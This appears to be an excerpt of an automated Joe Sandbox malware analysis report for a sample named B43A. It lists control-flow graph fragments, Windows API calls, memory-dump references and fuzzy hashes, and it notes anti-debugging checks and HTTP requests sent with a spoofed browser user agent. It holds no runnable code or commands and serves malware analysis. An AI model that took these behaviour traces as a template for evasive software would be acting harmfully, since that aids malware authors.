                                                                                                                                                                                                                                                                                                                                  control_flow_graph 403 623a7f-623a8b 404 623abd-623ac8 call 61c299 403->404 405 623a8d-623a8f 403->405 412 623aca-623acc 404->412 407 623a91-623a92 405->407 408 623aa8-623ab9 RtlAllocateHeap 405->408 407->408 409 623a94-623a9b call 61d1a4 408->409 410 623abb 408->410 409->404 415 623a9d-623aa6 call 6235a5 409->415 410->412 415->404 415->408
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • RtlAllocateHeap.NTDLL(00000000,?), ref: 00623AB1
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.2119111432.00000000005C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2119037784.00000000005C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2119244600.0000000000630000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2119302748.000000000063A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2119360707.0000000000640000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_5c0000_B43A.jbxd
                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: AllocateHeap
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 1279760036-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 949b30e26b97d109a26fd35a1fff8b451e0030f48268328663ffcf2d099d1559
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 294d124b8f53a43dab9095c311b03d51a7ce83f50025aab719f3f4143bceb36a
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 949b30e26b97d109a26fd35a1fff8b451e0030f48268328663ffcf2d099d1559
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 68E0E531240E356BE7213A69BC04BDB3B5B9F413B0F150031FC85AA3D0CB68CE014AE5
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                                                  control_flow_graph 418 4054f9-40551b HeapCreate 419 40551d-40551e 418->419 420 40551f-405528 418->420
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 0040550E
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.2118092287.0000000000403000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2117929397.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2118008646.0000000000401000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2118217497.000000000040B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2118288328.000000000040D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2118781005.0000000000494000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_B43A.jbxd
                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: CreateHeap
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 10892065-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 346172c717b8bf92eafb1f4e2d3afe935f66196829703aed5daf7b8231fe5198
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 5fb17f15b641ed3e70dae3670be4cfefbf906177b8503d1774ee76058e28c1fa
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 346172c717b8bf92eafb1f4e2d3afe935f66196829703aed5daf7b8231fe5198
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F2D05E365A0305AAEB105F716D087633BDCD794795F008437B94DC7190F6B4CA408A58
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                                                  control_flow_graph 421 61d6c5-61d6d8 call 6232e2 423 61d6dd-61d6df 421->423
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0061D6D8
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 006232E2: RtlFreeHeap.NTDLL(00000000,00000000,?,006262EA,?,00000000,?,?,?,006261F5,?,00000007,?,?,0062693B,?), ref: 006232F8
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 006232E2: GetLastError.KERNEL32(?,?,006262EA,?,00000000,?,?,?,006261F5,?,00000007,?,?,0062693B,?,?), ref: 0062330A
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.2119111432.00000000005C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2119037784.00000000005C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2119244600.0000000000630000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2119302748.000000000063A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2119360707.0000000000640000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_5c0000_B43A.jbxd
                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: ErrorFreeHeapLast_free
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 1353095263-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: dce263dd2b66d3c46ff005e6ef609abf1673b38a8881bd7193a125253371cea2
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 9b2566738cdb6fe57c12b23362728a695140e9bc5f6cf06f51c427739b5a156b
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: dce263dd2b66d3c46ff005e6ef609abf1673b38a8881bd7193a125253371cea2
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FBC08C31000308FBCB00AB45D807A4E7BA9DB80364F204048F40117240CBB2EF009A84
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                                                  control_flow_graph 424 403520-403535 FreeConsole
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.2118092287.0000000000403000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2117929397.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2118008646.0000000000401000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2118217497.000000000040B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2118288328.000000000040D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2118781005.0000000000494000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_B43A.jbxd
                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: ConsoleFree
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 771614528-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: a722221aecd90878a92c137ed78de4bd73bacce319688a350687ea725cbbab87
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 03b9cb923caf997e63203068c1baaa256c05f53771f476961164ec71a74f90d0
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a722221aecd90878a92c137ed78de4bd73bacce319688a350687ea725cbbab87
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CBB09BB4411208F7C700DB95CB0884F77FCD604245B104454B60063344CB759A046BA8
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 005C66D0: ExitProcess.KERNEL32 ref: 005C6735
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 005C1300: GetUserNameW.ADVAPI32 ref: 005C1331
                                                                                                                                                                                                                                                                                                                                  • ExitProcess.KERNEL32 ref: 0060F786
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.2119111432.00000000005C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2119037784.00000000005C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2119244600.0000000000630000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2119302748.000000000063A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2119360707.0000000000640000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_5c0000_B43A.jbxd
                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: ExitProcess$NameUser
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 2325108642-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: fa7706616bcc31ae0c38511efa2a606b8313e50c7db8d4feda99d5b92cb92dce
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 3753b8787c67f3bba4efd37bc8623af122307007a25a99637a9c061648a9f9a3
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fa7706616bcc31ae0c38511efa2a606b8313e50c7db8d4feda99d5b92cb92dce
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 80B01120288223AEC2803FF0080FB0C2E22BF82F83F000008F288200838C0AC88088BF
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.2119111432.00000000005C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2119037784.00000000005C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2119244600.0000000000630000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2119302748.000000000063A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2119360707.0000000000640000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_5c0000_B43A.jbxd
                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: lstrlen$lstrcat
                                                                                                                                                                                                                                                                                                                                  • String ID: !@$LOCK$\??\$kernel32.dll$ntdll.dll
                                                                                                                                                                                                                                                                                                                                  • API String ID: 493641738-3540211561
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 564c63579ee2b6e9d1fad20d182ea0fe973c22b28d4bee462f1f41772b8a0d60
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 84f3afff9357b8088c415f249418296649e7fda8cc2b194aa73cac2043c3e423
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 564c63579ee2b6e9d1fad20d182ea0fe973c22b28d4bee462f1f41772b8a0d60
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1B12E0B55097008FD354DF68C58962ABBF1FF88314F148A2EF8A9873A0D775D985CB82
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  • <, xrefs: 005F627E
                                                                                                                                                                                                                                                                                                                                  • Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36, xrefs: 005F6235
                                                                                                                                                                                                                                                                                                                                  • GET, xrefs: 005F63BA
                                                                                                                                                                                                                                                                                                                                  • <, xrefs: 005F628B
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.2119111432.00000000005C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2119037784.00000000005C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2119244600.0000000000630000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2119302748.000000000063A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2119360707.0000000000640000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_5c0000_B43A.jbxd
                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: Http$AvailableCloseConnectCrackDataHandleOpenQueryReceiveRequestResponseSend
                                                                                                                                                                                                                                                                                                                                  • String ID: <$<$GET$Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                  • API String ID: 3296817014-3606546913
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: e02780d511d04e72fd2bdf1791012f42773d50598a7bff5e3004469578524923
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: c206693082f6cfc92824d32266e3c4ed3086a6855302ac5984bc30f1382b9a9c
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e02780d511d04e72fd2bdf1791012f42773d50598a7bff5e3004469578524923
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FCB1DDB0508301CFD754EF28C19876EBBE1BB88718F508E2DF59997290D7788989CF86
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.2119111432.00000000005C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2119037784.00000000005C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2119244600.0000000000630000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2119302748.000000000063A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2119360707.0000000000640000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_5c0000_B43A.jbxd
                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: Heap$Process$Alloc$Free$BitsObjectRelease
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 332556478-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 705d1696a59512c15794155a8b9c2c57b4c7a52b64800f92d6d470e65e91811d
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 480f1db31084c2e60592b344ea50813752d9d3be54cabcf0cd94e76651c7dbf5
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 705d1696a59512c15794155a8b9c2c57b4c7a52b64800f92d6d470e65e91811d
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 07F17E76A006118FD718DF78C84129ABBE2FF89320F258369E965EB3E4D7749C41CB80
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • IsDebuggerPresent.KERNEL32 ref: 00409730
                                                                                                                                                                                                                                                                                                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00409745
                                                                                                                                                                                                                                                                                                                                  • UnhandledExceptionFilter.KERNEL32(0040C254), ref: 00409750
                                                                                                                                                                                                                                                                                                                                  • GetCurrentProcess.KERNEL32(C0000409), ref: 0040976C
                                                                                                                                                                                                                                                                                                                                  • TerminateProcess.KERNEL32(00000000), ref: 00409773
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.2118092287.0000000000403000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2117929397.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2118008646.0000000000401000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2118217497.000000000040B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2118288328.000000000040D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2118781005.0000000000494000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_B43A.jbxd
                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 2579439406-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: e439fa4b6ee22d99b4f68d71e246144b19d6780c00354f3e4974276a6dcce2fc
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 53a8578d4835903f000ab9bc39524206b7cb2b9494f9d1bdc6c6cf89bf368f49
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e439fa4b6ee22d99b4f68d71e246144b19d6780c00354f3e4974276a6dcce2fc
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0F21F4B4900204EFC700EF15ED466457BB4FB2A702F10407BE80897371DBB15A858F5D
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.2119111432.00000000005C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2119037784.00000000005C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2119244600.0000000000630000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2119302748.000000000063A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2119360707.0000000000640000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_5c0000_B43A.jbxd
                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: MetricsSystem$CreateDelete
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 1043530637-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: b52859b44182a115ff76fe8ea605328a526ab0e5a75c25b9c7dc5e3c7cb8218a
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: a25c921894ca1bf70ca1a3fc91ef09ec675f9be453b40f4aa0d461bbc8524693
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b52859b44182a115ff76fe8ea605328a526ab0e5a75c25b9c7dc5e3c7cb8218a
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1151C3BE52020BABD700BF78E8562D777F2EF2A310F509224F5998B364E3790445CB96
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 00615D41
                                                                                                                                                                                                                                                                                                                                  • IsDebuggerPresent.KERNEL32 ref: 00615E0D
                                                                                                                                                                                                                                                                                                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00615E26
                                                                                                                                                                                                                                                                                                                                  • UnhandledExceptionFilter.KERNEL32(?), ref: 00615E30
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.2119111432.00000000005C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2119037784.00000000005C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2119244600.0000000000630000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2119302748.000000000063A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2119360707.0000000000640000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_5c0000_B43A.jbxd
                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 254469556-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 68c57a7438aa0b598fed7b289d758c96efb19c931db6476a51f6b5feecb8d739
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 282ed199d0a39d580e20e6e3dc8e9df2061e32571e502f2c6a843077607dc160
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 68c57a7438aa0b598fed7b289d758c96efb19c931db6476a51f6b5feecb8d739
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7731E5B5D01318DBDB21DFA5D949BCDBBB8AF48300F1041AAE40DAB250EB709B858F85
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • _strlen.LIBCMT ref: 005F58D1
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0061D6C5: _free.LIBCMT ref: 0061D6D8
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.2119111432.00000000005C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2119037784.00000000005C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2119244600.0000000000630000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2119302748.000000000063A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2119360707.0000000000640000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_5c0000_B43A.jbxd
                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: _free_strlen
                                                                                                                                                                                                                                                                                                                                  • String ID: K$P
                                                                                                                                                                                                                                                                                                                                  • API String ID: 2535082280-420285281
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 6a8e10516f300614c4afedb4f4ee97e90219371a5e8fd31b060ddd42c7aea7e6
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: e6a79291a6a3535891926fc55a5272e3aa5bf6b8f1c0627e1135e2868f9f3280
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6a8e10516f300614c4afedb4f4ee97e90219371a5e8fd31b060ddd42c7aea7e6
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 29F1E774508785CFD324CF68C084B6AFBE1BF99300F15895EEAD99B352E7789844CB62
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

